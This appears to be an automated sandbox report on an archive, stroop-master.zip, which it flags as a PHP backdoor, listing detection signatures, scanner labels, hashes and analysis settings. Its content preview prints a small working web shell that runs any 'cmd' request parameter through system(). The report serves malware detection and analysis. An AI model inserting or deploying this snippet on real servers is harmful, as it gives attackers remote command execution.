Windows
Analysis Report
stroop-master.zip
Overview
General Information
Detection
Score: | 56 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | webshell_simple_backdoor | Web Shell - file simple-backdoor.php | Florian Roth | |
| | WebShell_Simple_PHP_backdoor_by_DK | PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php | Florian Roth | |
AV Detection |
---|
Source: | ReversingLabs: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Classification label: |
Source: | ReversingLabs: |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| | 32% | ReversingLabs | Script-PHP.Backdoor.Yorcirekrikseng | |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1430585 |
Start date and time: | 2024-04-23 22:48:08 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 2m 10s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultwindowsinteractivecookbook.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of new started processes analysed: | 11 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | stroop-master.zip |
Detection: | MAL |
Classification: | mal56.winZIP@0/0@0/0 |
Cookbook Comments: |
|
- No process behavior to analyse as no analysis process or sample was found
- Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
- Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- VT rate limit hit for: stroop-master.zip
File type: | |
Entropy (8bit): | 4.449015511855094 |
TrID: | |
File name: | stroop-master.zip |
File size: | 170 bytes |
MD5: | 5127dd7dec482d81ea1d10be3d7c31d1 |
SHA1: | 11c57fe7eee4518cce026962ee42aedfd4b4fc03 |
SHA256: | b31580e55640ffde6967ba13303b4207bb49242dba5168e695a530ce26a032ff |
SHA512: | 5996b9d9e8c3a08392297d70de860d60ffdf20a39d8eb3108d0da74e1424a9baa7937abf04638b061e46256911abfec33f1a106c12c7ccf7df499e1f72951533 |
SSDEEP: | 3:ZoUogv9G87MAdFFFBe5VX+Xv/FBiFQ29G87M36mITBMeWFZe5KVDov/TTv:WU9vk1OFB2+X7kk1U1W3z8X |
TLSH: | CFC04CA23A4E911562748475424D2814E445414F54209B1574DEA061AF3B0BBA5F89BC |
File Content Preview: | <?php....if(isset($_REQUEST['cmd'])){.. echo "<pre>";.. $cmd = ($_REQUEST['cmd']);.. system($cmd);.. echo "</pre>";.. die;..}....?>.... |
Icon Hash: | 1c1c1e4e4ececedc |